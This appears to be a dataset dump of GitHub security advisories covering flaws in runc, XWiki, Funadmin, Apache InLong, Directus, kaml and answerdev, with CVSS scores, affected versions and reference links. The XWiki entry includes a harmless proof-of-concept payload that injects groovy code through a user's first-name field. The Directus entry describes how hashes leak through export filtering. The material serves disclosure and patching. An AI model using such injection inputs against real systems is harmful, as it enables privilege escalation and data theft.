[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/answerdev/answer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.6'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1240'}, {'type': 'WEB', 'url': 'https://github.com/answerdev/answer/commit/90bfa0dcc7b49482f1d1e31aee3ab073f3c13dd9'}, {'type': 'PACKAGE', 'url': 'https://github.com/answerdev/answer'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/a24f57a4-22e3-4a17-8227-6a410a11498a'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-08T17:11:05Z', 'nvd_published_at': '2023-03-07T08:15:00Z'}
|
1.4.0
|
GHSA-v43v-pv95-jc55
|
2023-03-14T23:02:19Z
|
2023-03-07T18:30:38Z
| null |
['CVE-2023-24775']
|
SQL Injection in Funadmin
|
Funadmin v3.2.0 was discovered to contain a SQL injection vulnerability via the selectFields parameter at \member\Member.php.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'funadmin/funadmin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.2.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24775'}, {'type': 'WEB', 'url': 'https://github.com/funadmin/funadmin/issues/9'}]
|
{'cwe_ids': ['CWE-89'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-03-14T23:02:19Z', 'nvd_published_at': '2023-03-07T18:15:00Z'}
|
1.4.0
|
GHSA-vpvm-3wq2-2wvm
|
2023-03-29T14:46:15Z
|
2023-03-03T21:30:19Z
| null |
['CVE-2023-27561']
|
Opencontainers runc Incorrect Authorization vulnerability
|
runc 1.0.0-rc95 through 1.1.4 has Incorrect Access Control leading to Escalation of Privileges, related to `libcontainer/rootfs_linux.go`. To exploit this, an attacker must be able to spawn two containers with custom volume-mount configurations, and be able to run custom images. NOTE: this issue exists because of a CVE-2019-19921 regression.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/opencontainers/runc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0-rc95'}, {'fixed': '1.1.5'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-27561'}, {'type': 'WEB', 'url': 'https://github.com/opencontainers/runc/issues/2197#issuecomment-1437617334'}, {'type': 'WEB', 'url': 'https://github.com/opencontainers/runc/issues/3751'}, {'type': 'WEB', 'url': 'https://github.com/opencontainers/runc/pull/3785'}, {'type': 'WEB', 'url': 'https://gist.github.com/LiveOverflow/c937820b688922eb127fb760ce06dab9'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencontainers/runc'}, {'type': 'WEB', 'url': 'https://github.com/opencontainers/runc/releases/tag/v1.1.5'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2023/03/msg00023.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/[email protected]/message/ANUGDBJ7NBUMSUFZUSKU3ZMQYZ2Z3STN/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/[email protected]/message/DHGVGGMKGZSJ7YO67TGGPFEHBYMS63VF/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/[email protected]/message/FNB2UEDIIJCRQW4WJLZOPQJZXCVSXMLD/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/[email protected]/message/FYVE3GB4OG3BNT5DLQHYO4M5SXX33AQ5/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/[email protected]/message/I6BF24VCZRFTYBTT3T7HDZUOTKOTNPLZ/'}]
|
{'cwe_ids': ['CWE-706'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-03T22:43:16Z', 'nvd_published_at': '2023-03-03T19:15:00Z'}
|
1.4.0
|
GHSA-8cw6-4r32-6r3h
|
2023-03-03T22:49:27Z
|
2023-03-03T22:49:27Z
| null |
['CVE-2023-26055']
|
XWiki Platform may allow privilege escalation to programming rights via user's first name
|
### Impact
Any user can edit his own profile and inject code which is going to be executed with programming right.
Steps to reproduce:
* Set your first name to
```
{{cache id="userProfile"}}{{groovy}}println("Hello from groovy!"){{/groovy}}{{/cache}}
```
The first name appears as interpreted "`Hello from groovy`" instead of the expected fully escaped "`{{cache id="userProfile"}}{{groovy}}println("Hello from groovy!"){{/groovy}}{{/cache}}`".
The same vulnerability can also be exploited in all other places where short text properties are displayed, e.g., in apps created using [Apps Within Minutes](https://extensions.xwiki.org/xwiki/bin/view/Extension/App%20Within%20Minutes%20Application) that use a short text field.
### Patches
The problem has been patched on versions 13.10.9, 14.4.4, 14.7RC1.
### Workarounds
There are no other workarounds than upgrading XWiki or patching the xwiki-commons-xml JAR file.
### References
* https://jira.xwiki.org/browse/XWIKI-19793
* https://jira.xwiki.org/browse/XWIKI-19794
* https://jira.xwiki.org/browse/XCOMMONS-2498
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)
* Email us at [Security Mailing List](mailto:[email protected])
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.commons:xwiki-commons-xml'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.1-milestone-1'}, {'fixed': '13.10.9'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.commons:xwiki-commons-xml'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.0-rc-1'}, {'fixed': '14.4.4'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.commons:xwiki-commons-xml'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.5'}, {'fixed': '14.7-rc-1'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-commons/security/advisories/GHSA-8cw6-4r32-6r3h'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26055'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-commons'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XCOMMONS-2498'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-19793'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-19794'}]
|
{'cwe_ids': ['CWE-150'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-03-03T22:49:27Z', 'nvd_published_at': '2023-03-02T19:15:00Z'}
|
1.4.0
|
GHSA-c24f-2j3g-rg48
|
2023-03-20T21:26:59Z
|
2023-03-20T21:26:59Z
| null |
['CVE-2023-28118']
|
kaml has potential denial of service while parsing input with anchors and aliases
|
### Impact
Applications that use kaml to parse untrusted input containing anchors and aliases may consume excessive memory and crash.
### Patches
Version 0.53.0 and later default to refusing to parse YAML documents containing anchors and aliases.
### Workarounds
None.
### References
Wikipedia has an explanation of this class of vulnerability: [billion laughs attack](https://en.wikipedia.org/wiki/Billion_laughs_attack)
### Acknowledgements
Thank you to @gdude2002 for reporting this issue.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'com.charleskorn.kaml:kaml'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.53.0'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/charleskorn/kaml/security/advisories/GHSA-c24f-2j3g-rg48'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28118'}, {'type': 'WEB', 'url': 'https://github.com/charleskorn/kaml/commit/5f82a2d7e00bfc307afca05d1dc4d7c50593531a'}, {'type': 'PACKAGE', 'url': 'https://github.com/charleskorn/kaml'}, {'type': 'WEB', 'url': 'https://github.com/charleskorn/kaml/releases/tag/0.53.0'}]
|
{'cwe_ids': ['CWE-776'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-20T21:26:59Z', 'nvd_published_at': '2023-03-20T13:15:00Z'}
|
1.4.0
|
GHSA-gpqq-59rp-3c3w
|
2023-03-31T16:08:49Z
|
2023-03-27T15:30:16Z
| null |
['CVE-2023-27296']
|
Apache InLong vulnerable to JDBC Deserialization of Untrusted Data
|
Apache InLong versions from 1.1.0 through 1.5.0 are vulnerable to Java Database Connectivity (JDBC) deserialization of untrusted data from the MySQL JDBC URL in MySQLDataNode. It could be triggered by authenticated users of InLong. This has been patched in version 1.6.0. Users are advised to upgrade to Apache InLong's latest version or cherry-pick the [patch](https://github.com/apache/inlong/pull/7422) to solve it.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.inlong:inlong-manager'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.1.0'}, {'fixed': '1.6.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-27296'}, {'type': 'WEB', 'url': 'https://github.com/apache/inlong/pull/7422'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/inlong'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/xbvtjw9bwzgbo9fp1by8o3p49nf59xzt'}, {'type': 'WEB', 'url': 'https://programmer.help/blogs/jdbc-deserialization-vulnerability-learning.html'}]
|
{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-27T22:10:31Z', 'nvd_published_at': '2023-03-27T15:15:00Z'}
|
1.4.0
|
GHSA-m5q3-8wgf-x8xf
|
2023-03-08T17:13:05Z
|
2023-03-08T17:13:05Z
| null |
['CVE-2023-27481']
|
Directus vulnerable to extraction of password hashes through export querying
|
### Impact
Users with read access to the `password` field in `directus_users` can extract the argon2 password hashes by brute forcing the export functionality combined with a `_starts_with` filter. This allows the user to enumerate the password hashes.
### Patches
The problem has been patched by preventing any hashed/concealed field to be filtered against with the `_starts_with` or other string operator.
### Workarounds
Ensuring that no user has `read` access to the `password` field in `directus_users` is sufficient to prevent this vulnerability.
### For more information
If you have any questions or comments about this advisory:
* Open a Discussion in [directus/directus](https://github.com/directus/directus/discussions/new)
* Email us at [[email protected]](mailto:[email protected])
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N'}]
|
[{'package': {'ecosystem': 'npm', 'name': 'directus'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '9.16.0'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/directus/directus/security/advisories/GHSA-m5q3-8wgf-x8xf'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-27481'}, {'type': 'WEB', 'url': 'https://github.com/directus/directus/pull/14829'}, {'type': 'WEB', 'url': 'https://github.com/directus/directus/pull/15010'}, {'type': 'PACKAGE', 'url': 'https://github.com/directus/directus'}]
|
{'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-08T17:13:05Z', 'nvd_published_at': '2023-03-07T19:15:00Z'}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.